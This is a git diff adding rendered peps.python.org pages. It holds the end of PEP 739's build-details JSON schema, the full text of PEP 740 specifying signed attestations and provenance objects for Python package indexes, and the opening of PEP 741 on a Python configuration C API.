+ 16      "description": "Schema version.\n\nThis is a string following the format ``<MAJOR>.<MINOR>``, where ``<MAJOR>`` and ``<MINOR>`` are unpaded numbers and represent the **major** and **minor** components of the version. Versions may be arithmetic compared by intrepreting the version string as a decimal number.\n\nFor this specification version, this value is constant and MUST be ``1.0``.\n\nFuture versions of this schema MUST use a higher version number. Future versions of this schema MUST NOT use the same **major** version component as other schema version unless its specification is deemed backwards-compatible with them — it can't change, or extend, any parts of the current specification in such a way as the semantics of the interpreted data differ, or that data valid under the new specification is invalid under the older specification, with the exception of additional properties (errors caused by ``additionalProperties``).",
+ 17      "const": "1.0"
+ 18    },
+ 19    "base_prefix": {
+ 20      "type": "string",
+ 21      "description": "Base prefix of the Python installation.\n\nEither an absolute path, or a relative path to directory where this file is contained.",
+ 22      "examples": [
+ 23        "/usr",
+ 24        "../.."
+ 25      ]
+ 26    },
+ 27    "platform": {
+ 28      "type": "string",
+ 29      "description": "System platform string.\n\nThis field SHOULD be equivalent to ``sysconfig.get_platform()``.",
+ 30      "examples": [
+ 31        "linux-x86_64"
+ 32      ]
+ 33    },
+ 34    "language": {
+ 35      "type": "object",
+ 36      "description": "Object containing details related to the Python language specification.\n\nIn addition to the required keys, implementations may choose to include extra keys with implementation-specific details.",
+ 37      "required": [
+ 38        "version"
+ 39      ],
+ 40      "additionalProperties": false,
+ 41      "properties": {
+ 42        "version": {
+ 43          "type": "string",
+ 44          "description": "String representation the Python language version — a version string consisting only of the *major* and *minor* components.\n\nThis field SHOULD be equivalent to ``sysconfig.get_python_version()``.",
+ 45          "examples": ["3.14"]
+ 46        },
+ 47        "version_info": {
+ 48          "type": "object",
+ 49          "description": "Object in the format of :py:data:`sys.version_info`.\n\nThis section SHOULD be equivalent to :py:data:`sys.version_info`.",
+ 50          "required": ["major", "minor", "micro", "releaselevel", "serial"],
+ 51          "additionalProperties": false,
+ 52          "examples": [
+ 53            {
+ 54              "major": 3,
+ 55              "minor": 14,
+ 56              "micro": 1,
+ 57              "releaselevel": "final",
+ 58              "serial": 0
+ 59            }
+ 60          ],
+ 61          "properties": {
+ 62            "major": {
+ 63              "type": "number"
+ 64            },
+ 65            "minor": {
+ 66              "type": "number"
+ 67            },
+ 68            "micro": {
+ 69              "type": "number"
+ 70            },
+ 71            "releaselevel": {
+ 72              "type": "string",
+ 73              "enum": ["alpha", "beta", "candidate", "final"]
+ 74            },
+ 75            "serial": {
+ 76              "type": "number"
+ 77            }
+ 78          }
+ 79        }
+ 80      }
+ 81    },
+ 82    "implementation": {
+ 83      "type": "object",
+ 84      "description": "Object containing details related to Python implementation.\n\nThis section SHOULD be equivalent to :py:data:`sys.implementation`. It follows specification defined in PEP 421, meaning that on top of the required keys, implementation-specific keys can also exist, but must be prefixed with an underscore.",
+ 85      "required": [
+ 86        "name",
+ 87        "version",
+ 88        "hexversion",
+ 89        "cache_tag"
+ 90      ],
+ 91      "additionalProperties": true,
+ 92      "properties": {
+ 93        "name": {
+ 94          "type": "string",
+ 95          "description": "Lower-case name of the Python implementation.",
+ 96          "examples": ["cpython", "pypy"]
+ 97        },
+ 98        "version": {
+ 99          "type": "object",
+100          "description": "Object in the format of :py:data:`sys.version_info`, containing the implementation version.",
+101          "required": ["major", "minor", "micro", "releaselevel", "serial"],
+102          "additionalProperties": false,
+103          "examples": [
+104            {
+105              "major": 3,
+106              "minor": 14,
+107              "micro": 1,
+108              "releaselevel": "final",
+109              "serial": 0
+110            },
+111            {
+112              "major": 7,
+113              "minor": 3,
+114              "micro": 16,
+115              "releaselevel": "final",
+116              "serial": 0
+117            }
+118          ],
+119          "properties": {
+120            "major": {
+121              "type": "number"
+122            },
+123            "minor": {
+124              "type": "number"
+125            },
+126            "micro": {
+127              "type": "number"
+128            },
+129            "releaselevel": {
+130              "type": "string",
+131              "enum": ["alpha", "beta", "candidate", "final"]
+132            },
+133            "serial": {
+134              "type": "number"
+135            }
+136          }
+137        }
+138      }
+139    },
+140    "interpreter": {
+141      "type": "object",
+142      "description": "Object containing details Python interpreter.\n\nThis section MUST be present if the Python installation provides an interpreter binary, otherwise this section will be missing.",
+143      "required": [
+144        "path"
+145      ],
+146      "additionalProperties": false,
+147      "properties": {
+148        "path": {
+149          "type": "string",
+150          "description": "The path to the Python interprer. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.",
+151          "examples": [
+152            "/usr/bin/python",
+153            "bin/python"
+154          ]
+155        }
+156      }
+157    },
+158    "abi": {
+159      "type": "object",
+160      "description": "Object containing details related to ABI.",
+161      "required": [
+162        "flags",
+163        "extension_suffix"
+164      ],
+165      "additionalProperties": false,
+166      "properties": {
+167        "flags": {
+168          "type": "array",
+169          "description": "Build configuration flags, used to calculate the extension suffix.\n\nThe flags MUST be defined in the order they appear on the extension suffix.",
+170          "additionalProperties": true,
+171          "examples": [
+172            ["t", "d"]
+173          ]
+174        },
+175        "extension_suffix": {
+176          "type": "string",
+177          "description": "Suffix used for extensions built against the current implementation version.\n\nThis field MUST be present if the Python implementation supports extensions, otherwise this entry will be missing.",
+178          "examples": [
+179            ".cpython-314-x86_64-linux-gnu.so"
+180          ]
+181        },
+182        "stable_abi_suffix": {
+183          "type": "string",
+184          "description": "Suffix used for extensions built against the stable ABI.\n\nThis field MUST be present if the Python implementation has a stable ABI extension suffix, otherwise this entry will be missing.",
+185          "examples": [
+186            ".abi3.so"
+187          ]
+188        }
+189      }
+190    },
+191    "suffixes": {
+192      "type": "object",
+193      "description": "Valid module suffixes grouped by type.\n\nThis section SHOULD be equivalent to the ``importlib.machinery.*_SUFFIXES`` attributes, if the implementation provides such suffixes. However, if the Python implementation does not provide suffixes of the kind specified by any of the attributes, the equivalent sub-section is not required to be present. Additionally, if a Python implementation provides extension kinds other than the ones listed on ``importlib.machinery`` module, they MAY add a sub-section for them.",
+194      "examples": [
+195        {
+196          "source": [".py"],
+197          "bytecode": [".pyc"],
+198          "optimized_bytecode": [".pyc"],
+199          "debug_bytecode": [".pyc"],
+200          "extensions": [".cpython-313-x86_64-linux-gnu.so", ".abi3.so", ".so"]
+201        }
+202      ]
+203    },
+204    "libpython": {
+205      "type": "object",
+206      "description": "Object containing details related to the ``libpython`` library.\n\nThis section MUST by present if Python installation provides a ``libpython`` library, otherwise this section will be missing.",
+207      "additionalProperties": false,
+208      "properties": {
+209        "dynamic": {
+210          "type": "string",
+211          "description": "The path to the dynamic ``libpython`` library. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python installation provides a dynamic ``libpython`` library, otherwise this entry will be missing.",
+212          "examples": [
+213            "/usr/lib/libpython3.14.so.1.0",
+214            "lib/libpython3.14.so.1.0"
+215          ]
+216        },
+217        "dynamic_stableabi": {
+218          "type": "string",
+219          "description": "The path to the dynamic ``libpython`` library for the stable ABI. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python installation provides a dynamic ``libpython`` library, otherwise this entry will be missing.",
+220          "examples": [
+221            "/usr/lib/libpython3.so",
+222            "lib/libpython3.so"
+223          ]
+224        },
+225        "static": {
+226          "type": "string",
+227          "description": "The path to the static ``libpython`` library. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python installation provides a static ``libpython`` library, otherwise this entry will be missing.",
+228          "examples": [
+229            "/usr/lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a",
+230            "lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a"
+231          ]
+232        },
+233        "link_to_libpython": {
+234          "type": "boolean",
+235          "description": "Should extensions built against a dynamic ``libpython`` link to it?\n\nThis field MUST be present if the Python installation provides a dynamic ``libpython`` library, otherwise this entry will be missing."
+236        }
+237      }
+238    },
+239    "c_api": {
+240      "type": "object",
+241      "description": "Object containing details related to the Python C API, if available.\n\nThis section MUST be present if the Python implementation provides a C API, otherwise this section will be missing.",
+242      "required": [
+243        "headers"
+244      ],
+245      "additionalProperties": false,
+246      "properties": {
+247        "headers": {
+248          "type": "string",
+249          "description": "The path to the C API headers. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.",
+250          "examples": [
+251            "/usr/include/python3.14",
+252            "include/python3.14"
+253          ]
+254        },
+255        "pkgconfig_path": {
+256          "type": "string",
+257          "description": "The path to the pkg-config definition files. Either an absolute path, or a relative path to the path defined in the ``base_prefix`` key.\n\nThis field MUST be present if the Python implementation provides pkg-config definition files for the C API, otherwise this section will be missing.",
+258          "examples": [
+259            "/usr/lib/pkgconfig",
+260            "lib/pkgconfig"
+261          ]
+262        }
+263      }
+264    },
+265    "arbitrary_data": {
+266      "type": "object",
+267      "description": "Object containing extra arbitrary data.\n\nThis is meant to be used as an escape-hatch, to include any relevant data that is not covered by this specification. Implamentations may choose what data to provide in this section.",
+268      "additionalProperties": true
+269    }
+270  }
+271}
+
+
+
+
+

Rejected Ideas

+
+

Having a larger scope

+

One of the main requests in the discussion of this PEP was the inclusion of +other kinds of information, such as the site-packages path. It is the opinion +of the PEP authors that information regarding the Python environment should be +provided by a separate file, creating a clear separation between the build +details, which should be immutable across any interpreter instance, and details +that can change, such as environment details.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0739.rst

+

Last modified: 2024-11-06 17:11:55 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0740/index.html b/pep-0740/index.html new file mode 100644 index 00000000000..2fffbb3477e --- /dev/null +++ b/pep-0740/index.html @@ -0,0 +1,876 @@ + + + + + + + + PEP 740 – Index support for digital attestations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 740 – Index support for digital attestations

+
+
Author:
+
William Woodruff <william at yossarian.net>, +Facundo Tuesca <facundo.tuesca at trailofbits.com>, +Dustin Ingram <di at python.org>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Jan-2024
+
Post-History:
+
02-Jan-2024, +29-Jan-2024
+
Resolution:
+
17-Jul-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Index hosted attestations, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at PyPI - Digital Attestations.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes a collection of changes related to the upload and distribution +of digitally signed attestations and metadata used to verify them on a Python +package repository, such as PyPI.

+

These changes have two subcomponents:

+ +

This PEP does not make a policy recommendation around mandatory digital +attestations on release uploads or their subsequent verification by installing +clients like pip.

+
+
+

Rationale and Motivation

+

Desire for digital signatures on Python packages has been repeatedly +expressed by both package maintainers and downstream users:

+
    +
  • Maintainers wish to demonstrate the integrity and authenticity of their +package uploads;
  • +
  • Individual downstream users wish to verify package integrity and authenticity +without placing additional trust in their index’s honesty;
  • +
  • “Bulk” downstream users (such as Operating System distributions) wish to +perform similar verifications and potentially re-expose or countersign +for their own downstream packaging ecosystems.
  • +
+

This proposal seeks to accommodate each of the above use cases.

+

Additionally, this proposal identifies the following motivations:

+
    +
  • Verifiable provenance for Python package distributions: many Python +packages currently contain unauthenticated provenance metadata, such +as URLs for source hosts. A cryptographic attestation format could enable +strong authenticated links between these packages and their source hosts, +allowing both the index and downstream users to cryptographically verify that +a package originates from its claimed source repository.
  • +
  • Raising attacker requirements: an attacker who seeks to take +over a Python package can be described along two dimensions: sophistication +(unsophisticated to sophisticated) and targeting +(opportunistic to targeted).

    Digital attestations impose additional sophistication requirements: the +attacker must be sufficiently sophisticated to access private signing material +(or signing identities).

    +
  • +
  • Index verifiability: in the status quo, the only attestation provided by the +index is an optional PGP signature per release file +(see PGP signatures). These signatures are not +(and cannot be) checked by the index either for well-formedness or for +validity, since the index has no mechanism for identifying the right public +key for the signature. This PEP overcomes this limitation +by ensuring that provenance objects contain all +of the metadata needed by the index to verify an attestation’s validity.
  • +
+

This PEP proposes a generic attestation format, containing an +attestation statement for signature generation, +with the expectation that index providers adopt the +format with a suitable source of identity for signature verification, such as +Trusted Publishing.

+
+

Design Considerations

+

This PEP identifies the following design considerations when evaluating +both its own proposed changes and previous work in the same or adjacent +areas of Python packaging:

+
    +
  1. Index accessibility: digital attestations for Python packages +are ideally retrievable directly from the index itself, as “detached” +resources.

    This both simplifies some compatibility concerns (by avoiding +the need to modify the distribution formats themselves) and also simplifies +the behavior of potential installing clients (by allowing them to +retrieve each attestation before its corresponding package without needing +to do streaming decompression).

    +
  +
  2. Verification by the index itself: in addition to enabling verification +by installing clients, each digital attestation is ideally verifiable +in some form by the index itself.

    This both increases the overall quality +of attestations uploaded to the index (preventing, for example, users +from accidentally uploading incorrect or invalid attestations) and also +enables UI and UX refinements on the index itself (such as a “provenance” +view for each uploaded package).

    +
  +
  3. General applicability: digital attestations should be applicable to +any and every package uploaded to the index, regardless of its format +(sdist or wheel) or interior contents.
  +
  4. Metadata support: this PEP refers to “digital attestations” rather than +just “digital signatures” to emphasize the ideal presence of additional +metadata within the cryptographic envelope.

    For example, to prevent domain separation between a distribution’s name and +its contents, this PEP uses ‘Statements’ +from the in-toto project to bind the distribution’s +contents (via SHA-256 digest) to its filename.

    +
  +
+
+
+

Previous Work

+
+

PGP signatures

+

PyPI and other indices have historically supported PGP signatures on uploaded +distributions. These could be supplied during upload, and could be retrieved +by installing clients via the data-gpg-sig attribute in the PEP 503 +API, the gpg-sig key on the PEP 691 API, or via an adjacent +.asc-suffixed URL.

+

PGP signature uploads have been disabled on PyPI since +May 2023, after +an investigation +determined that the majority of signatures (which, themselves, constituted a +tiny percentage of overall uploads) could not be associated with a public key or +otherwise meaningfully verified.

+

In their previously supported form on PyPI, PGP signatures satisfied +considerations (1) and (3) above but not (2) (owing to the need for external +keyservers and key distribution) or (4) (due to PGP signatures typically being +constructed over just an input file, without any associated signed metadata).

+
+
+

Wheel signatures

+

PEP 427 (and its living PyPA counterpart) +specify the wheel format.

+

This format includes accommodations for digital signatures embedded directly +into the wheel, in either JWS or S/MIME format. These signatures are specified +over a PEP 376 RECORD, which is modified to include a cryptographic digest +for each recorded file in the wheel.

+

While wheel signatures are fully specified, they do not appear to be broadly +used; the official wheel tooling deprecated +signature generation and verification support +in 0.32.0, which was +released in 2018.

+

Additionally, wheel signatures do not satisfy any of +the above considerations (due to the “attached” nature of the signatures, +non-verifiability on the index itself, and support for wheels only).

+
+
+
+
+

Specification

+
+

Upload endpoint changes

+

The current upload API is not standardized. However, we propose the following +changes to it (a non-normative usage sketch follows the list):

+
    +
  • In addition to the current top-level content and gpg_signature fields, +the index SHALL accept attestations as an additional multipart form +field.
  • +
  • The new attestations field SHALL be a JSON array.
  • +
  • The attestations array SHALL have one or more items, each a JSON object +representing an individual attestation.
  • +
  • Each attestation object MUST be verifiable by the index. If the index fails +to verify any attestation in attestations, it MUST reject the upload. +The format of attestation objects is defined under Attestation objects +and the process for verifying attestations is defined under +Attestation verification.
  • +
+
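As a non-normative sketch, an uploader using the requests library might supply the new field as follows (the endpoint URL is a placeholder, since the upload API itself remains unstandardized):

import json
import requests

attestations = []  # one or more attestation objects, as specified below

with open("sampleproject-1.2.3.tar.gz", "rb") as dist:
    requests.post(
        "https://upload.example.org/legacy/",  # placeholder endpoint
        data={"attestations": json.dumps(attestations)},
        files={"content": dist},
    )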
+
+

Index changes

+
+

Simple Index

+

The following changes are made to the +simple repository API:

+ +
+
+

JSON-based Simple API

+

The following changes are made to the +JSON simple API:

+
    +
  • When an uploaded file has one or more attestations, the index MAY +include a provenance key in the file dictionary for that file.

    The value of the provenance key SHALL be either a JSON string +or null. If provenance is not null, it SHALL be a URL +to the associated provenance file.

    +

    See Appendix 3: Simple JSON API size considerations for an explanation of the technical decision to +embed the SHA-256 digest in the JSON API, rather than the full +provenance object.

    +
  • +
+

These changes require a version change to the JSON API:

+
    +
  • The api-version SHALL specify version 1.3 or later.
  • +
+
+
+
+

Attestation objects

+

An attestation object is a JSON object with several required keys; applications +or signers may include additional keys so long as all explicitly +listed keys are provided. The required layout of an attestation +object is provided as pseudocode below.

+
@dataclass
+class Attestation:
+    version: Literal[1]
+    """
+    The attestation object's version, which is always 1.
+    """
+
+    verification_material: VerificationMaterial
+    """
+    Cryptographic materials used to verify `envelope`.
+    """
+
+    envelope: Envelope
+    """
+    The enveloped attestation statement and signature.
+    """
+
+
+@dataclass
+class Envelope:
+    statement: bytes
+    """
+    The attestation statement.
+
+    This is represented as opaque bytes on the wire (encoded as base64),
+    but it MUST be a JSON in-toto v1 Statement.
+    """
+
+    signature: bytes
+    """
+    A signature for the above statement, encoded as base64.
+    """
+
+@dataclass
+class VerificationMaterial:
+    certificate: str
+    """
+    The signing certificate, as `base64(DER(cert))`.
+    """
+
+    transparency_entries: list[object]
+    """
+    One or more transparency log entries for this attestation's signature
+    and certificate.
+    """
+
+
+

A full data model for each object in transparency_entries is provided in +Appendix 2: Data models for Transparency Log Entries. Attestation objects SHOULD include one or more +transparency log entries, and MAY include additional keys for other +sources of signed time (such as an RFC 3161 Time Stamping Authority or a +Roughtime server).

+

Attestation objects are versioned; this PEP specifies version 1. Each version +is tied to a single cryptographic suite to minimize unnecessary cryptographic +agility. In version 1, the suite is as follows:

+
    +
  • Certificates are specified as X.509 certificates, and comply with the +profile in RFC 5280.
  • +
  • The message signature algorithm is ECDSA, with the P-256 curve for public keys +and SHA-256 as the cryptographic digest function.
  • +
+

Future PEPs may change this suite (and the overall shape of the attestation +object) by selecting a new version number.

+
+

Attestation statement and signature generation

+

The attestation statement is the actual claim that is cryptographically signed +over within the attestation object (i.e., the envelope.statement).

+

The attestation statement is encoded as a +v1 in-toto Statement object, +in JSON form. When serialized, the statement is treated as an opaque binary blob, +avoiding the need for canonicalization. An example JSON-encoded statement is +provided in Appendix 4: Example attestation statement.

+

In addition to being a v1 in-toto Statement, the attestation statement is constrained +in the following ways:

+
    +
  • The in-toto subject MUST contain only a single subject.
  • +
  • subject[0].name is the distribution’s filename, which MUST be +a valid source distribution or +wheel distribution filename.
  • +
  • subject[0].digest MUST contain a SHA-256 digest. Other digests +MAY be present. The digests MUST be represented as hexadecimal strings.
  • +
  • The following predicateType values are supported:
      • SLSA Provenance v1 (https://slsa.dev/provenance/v1)
      • PyPI Publish Attestation v1 (https://docs.pypi.org/attestations/publish/v1)
  • +
+

The signature over this statement is constructed using the +v1 DSSE signature protocol, +with a PAYLOAD_TYPE of application/vnd.in-toto+json and a PAYLOAD_BODY of the JSON-encoded +statement above. No other PAYLOAD_TYPE is permitted.
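For concreteness, a sketch of the pre-authentication encoding (PAE) defined by the v1 DSSE protocol, over which the signature is computed:

def pae(payload_type: str, payload: bytes) -> bytes:
    # DSSE v1 PAE: "DSSEv1" SP LEN(type) SP type SP LEN(payload) SP payload
    pt = payload_type.encode()
    return b"DSSEv1 %d %b %d %b" % (len(pt), pt, len(payload), payload)

statement = b'{"_type": "https://in-toto.io/Statement/v1"}'  # abbreviated example
to_be_signed = pae("application/vnd.in-toto+json", statement)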

+
+
+
+

Provenance objects

+

The index will serve uploaded attestations along with metadata that can assist +in verifying them in the form of JSON serialized objects.

+

These provenance objects will be available via both the Simple Index +and JSON-based Simple API as described above, and will have the following layout:

+
{
+    "version": 1,
+    "attestation_bundles": [
+      {
+        "publisher": {
+          "kind": "important-ci-service",
+          "claims": {},
+          "vendor-property": "foo",
+          "another-property": 123
+        },
+        "attestations": [
+          { /* attestation 1 ... */ },
+          { /* attestation 2 ... */ }
+        ]
+      }
+    ]
+}
+
+
+

or, as pseudocode:

+
@dataclass
+class Publisher:
+    kind: string
+    """
+    The kind of Trusted Publisher.
+    """
+
+    claims: object | None
+    """
+    Any context-specific claims retained by the index during Trusted Publisher
+    authentication.
+    """
+
+    _rest: object
+    """
+    Each publisher object is open-ended, meaning that it MAY contain additional
+    fields beyond the ones specified explicitly above. This field signals that,
+    but is not itself present.
+    """
+
+@dataclass
+class AttestationBundle:
+    publisher: Publisher
+    """
+    The publisher associated with this set of attestations.
+    """
+
+    attestations: list[Attestation]
+    """
+    The set of attestations included in this bundle.
+    """
+
+@dataclass
+class Provenance:
+    version: Literal[1]
+    """
+    The provenance object's version, which is always 1.
+    """
+
+    attestation_bundles: list[AttestationBundle]
+    """
+    One or more attestation "bundles".
+    """
+
+
+
    +
  • version is 1. Like attestation objects, provenance objects are +versioned, and this PEP only defines version 1.
  • +
  • attestation_bundles is a required JSON array, containing one +or more “bundles” of attestations. Each bundle corresponds to a +signing identity (such as a Trusted Publishing identity), and contains +one or more attestation objects.

    As noted in the Publisher model, +each AttestationBundle.publisher object is specific to its Trusted Publisher +but must include at minimum:

    +
      +
    • A kind key, which MUST be a JSON string that uniquely identifies the +kind of Trusted Publisher.
    • +
    • A claims key, which MUST be a JSON object containing any context-specific +claims retained by the index during Trusted Publisher authentication.
    • +
    +

    All other keys in the publisher object are publisher-specific. A full +illustrative example of a publisher object is provided in Appendix 1: Example Trusted Publisher Representation.

    +

    Each array of attestation objects is a superset of the attestations +array supplied by the uploader through the attestations field at upload +time, as described in Upload endpoint changes and +Changes to provenance objects.

    +
  • +
+
+

Changes to provenance objects

+

Provenance objects are not immutable, and may change over time. Reasons +for changes to the provenance object include but are not limited to:

+
    +
  • Addition of new attestations for a pre-existing signing identity: the index +MAY choose to allow additional attestations by pre-existing signing +identities, such as newer attestation versions for already uploaded +files.
  • +
  • Addition of new signing identities and associated attestations: the index +MAY choose to support attestations from sources other than the file’s +uploader, such as third-party auditors or the index itself. These attestations +may be performed asynchronously, requiring the index to insert them into +the provenance object post facto.
  • +
+
+
+
+

Attestation verification

+

Verifying an attestation object against a distribution file requires verification of each of the +following:

+
    +
  • version is 1. The verifier MUST reject any other version.
  • +
  • verification_material.certificate is a valid signing certificate, as +issued by an a priori trusted authority (such as a root of trust already +present within the verifying client).
  • +
  • verification_material.certificate identifies an appropriate signing +subject, such as the machine identity of the Trusted Publisher that published +the package.
  • +
  • envelope.statement is a valid in-toto v1 Statement, with a subject +and digest that MUST match the distribution’s filename and contents. +For the distribution’s filename, matching MUST be performed by parsing +using the appropriate source distribution or wheel filename format, as +the statement’s subject may be equivalent but normalized.
  • +
  • envelope.signature is a valid signature for envelope.statement +corresponding to verification_material.certificate, +as reconstituted via the +v1 DSSE signature protocol.
  • +
+

In addition to the above required steps, a verifier MAY additionally verify +verification_material.transparency_entries on a policy basis, e.g. requiring +at least one transparency log entry or a threshold of entries. When verifying +transparency entries, the verifier MUST confirm that the inclusion time for +each entry lies within the signing certificate’s validity period.
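A condensed, non-normative outline of these steps (certificate chain and signature checks are elided; a real verifier would perform them with an X.509 and ECDSA implementation):

import base64
import json

def verify_attestation(att: dict, filename: str, sha256_hex: str) -> None:
    if att["version"] != 1:
        raise ValueError("unsupported attestation version")
    # ...verify verification_material.certificate against a trusted root
    # and check that it identifies the expected signing subject...
    statement = json.loads(base64.b64decode(att["envelope"]["statement"]))
    (subject,) = statement["subject"]  # exactly one subject is required
    if subject["digest"]["sha256"] != sha256_hex:
        raise ValueError("digest mismatch")
    # ...compare subject["name"] against `filename` after parsing both with
    # the sdist/wheel filename rules, then verify envelope.signature over
    # the DSSE PAE of the statement...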

+
+
+
+

Security Implications

+

This PEP is primarily “mechanical” in nature; it provides layouts for +structuring and serving verifiable digital attestations without specifying +higher level security “policies” around attestation validity, thresholds +between attestations, and so forth.

+
+

Cryptographic agility in attestations

+

Algorithmic agility is a common source of exploitable vulnerabilities +in cryptographic schemes. This PEP limits algorithmic agility in two ways:

+
    +
  • All algorithms are specified in a single suite, rather than a geometric +collection of parameters. This makes it impossible (for example) for an +attacker to select a strong signature algorithm with a weak hash function, +compromising the scheme as a whole.
  • +
  • Attestation objects are versioned, and may only contain the algorithmic +suite specified for their version. If a specific suite +is considered insecure in the future, clients may choose to blanket reject +or qualify verifications of attestations that contain that suite.
  • +
+
+
+

Index trust

+

This PEP does not increase (or decrease) trust in the index itself: +the index is still effectively trusted to honestly deliver unmodified package +distributions, since a dishonest index capable of modifying package +contents could also dishonestly modify or omit package attestations. +As a result, this PEP’s presumption of index trust is equivalent to the +unstated presumption with earlier mechanisms, like PGP and wheel signatures.

+

This PEP does not preclude or exclude future index trust mechanisms, such +as PEP 458 and/or PEP 480.

+
+
+
+

Recommendations

+

This PEP recommends, but does not mandate, that attestation objects +contain one or more verifiable sources of signed time that corroborate the +signing certificate’s claimed validity period. Indices that implement this +PEP may choose to strictly enforce this requirement.

+
+
+

Appendix 1: Example Trusted Publisher Representation

+

This appendix provides a fictional example of a publisher key within +a simple JSON API project.files[].provenance listing:

+
"publisher": {
+    "kind": "GitHub",
+    "claims": {
+        "ref": "refs/tags/v1.0.0",
+        "sha": "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    },
+    "repository_name": "HolyGrail",
+    "repository_owner": "octocat",
+    "repository_owner_id": "1",
+    "workflow_filename": "publish.yml",
+    "environment": null
+}
+
+
+
+
+

Appendix 2: Data models for Transparency Log Entries

+

This appendix contains pseudocoded data models for transparency log entries +in attestation objects. Each transparency log entry serves as a source +of signed inclusion time, and can be verified either online or offline.

+
@dataclass
+class TransparencyLogEntry:
+    log_index: int
+    """
+    The global index of the log entry, used when querying the log.
+    """
+
+    log_id: str
+    """
+    An opaque, unique identifier for the log.
+    """
+
+    entry_kind: str
+    """
+    The kind (type) of log entry.
+    """
+
+    entry_version: str
+    """
+    The version of the log entry's submitted format.
+    """
+
+    integrated_time: int
+    """
+    The UNIX timestamp from the log, indicating when the entry was persisted.
+    """
+
+    inclusion_proof: InclusionProof
+    """
+    The actual inclusion proof of the log entry.
+    """
+
+
+@dataclass
+class InclusionProof:
+    log_index: int
+    """
+    The index of the entry in the tree it was written to.
+    """
+
+    root_hash: str
+    """
+    The digest stored at the root of the Merkle tree at the time of proof
+    generation.
+    """
+
+    tree_size: int
+    """
+    The size of the Merkle tree at the time of proof generation.
+    """
+
+    hashes: list[str]
+    """
+    A list of hashes required to complete the inclusion proof, sorted
+    in order from leaf to root. The leaf and root hashes are not themselves
+    included in this list; the root is supplied via `root_hash` and the client
+    must calculate the leaf hash.
+    """
+
+    checkpoint: str
+    """
+    The signed tree head's signature, at the time of proof generation.
+    """
+
+    cosigned_checkpoints: list[str]
+    """
+    Cosigned checkpoints from zero or more log witnesses.
+    """
+
+
+
+
+

Appendix 3: Simple JSON API size considerations

+

A previous draft of this PEP required embedding each +provenance object directly into its appropriate part +of the JSON Simple API.

+

The current version of this PEP embeds the SHA-256 digest of the provenance +object instead. This is done for size and network bandwidth reasons:

+
+
  1. We estimate the typical size of an attestation object to be approximately 5.3 KB of JSON.
  2. We conservatively estimate that indices eventually host around 3 attestations per release file, or approximately 15.9 KB of JSON per combined provenance object.
  3. As of May 2024, the average project on PyPI has approximately 21 release files. We conservatively expect this average to increase over time.
  4. Combined, these numbers imply that a typical project might expect to host between 60 and 70 attestations (21 × 3 = 63), or approximately 334 KB (63 × 5.3 KB) of additional JSON in its “project detail” endpoint.
+

These numbers are significantly worse in “pathological” cases, where projects +have hundreds or thousands of releases and/or dozens of files per release.

+
+
+

Appendix 4: Example attestation statement

+

Given a source distribution sampleproject-1.2.3.tar.gz with a SHA-256 +digest of e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, +the following is an appropriate in-toto Statement, as a JSON object:

+
{
+  "_type": "https://in-toto.io/Statement/v1",
+  "subject": [
+    {
+      "name": "sampleproject-1.2.3.tar.gz",
+      "digest": {"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}
+    }
+  ],
+  "predicateType": "https://some-arbitrary-predicate.example.com/v1",
+  "predicate": {
+    "something-else": "foo"
+  }
+}
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0740.rst

+

Last modified: 2024-12-03 18:16:41 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0741/index.html b/pep-0741/index.html new file mode 100644 index 00000000000..438a86bd8fc --- /dev/null +++ b/pep-0741/index.html @@ -0,0 +1,1157 @@ + + + + + + + + PEP 741 – Python Configuration C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 741 – Python Configuration C API

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Jan-2024
+
Python-Version:
+
3.14
+
Post-History:
+
19-Jan-2024, +08-Feb-2024
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a C API to configure the Python initialization without relying on C +structures, with the ability to make ABI-compatible changes in the future.

+

Complete the PEP 587 API by adding PyInitConfig_AddModule(), which can be +used to add a built-in extension module; a feature previously referred to +as the “inittab”.

+

Add PyConfig_Get() and PyConfig_Set() functions to +get and set the current runtime configuration.

+

PEP 587 “Python Initialization Configuration” unified all the ways to +configure the Python initialization. This PEP also unifies the +configuration of the Python preinitialization and the Python +initialization in a single API. Moreover, this PEP provides only a +single choice to embed Python, instead of the two “Python” and +“Isolated” choices of PEP 587, to simplify the API further.

+

The lower level PEP 587 PyConfig API remains available for use +cases with an intentionally higher level of coupling to CPython +implementation details (such as emulating the full functionality of +CPython’s CLI, including its configuration mechanisms).

+
+
+

Rationale

+
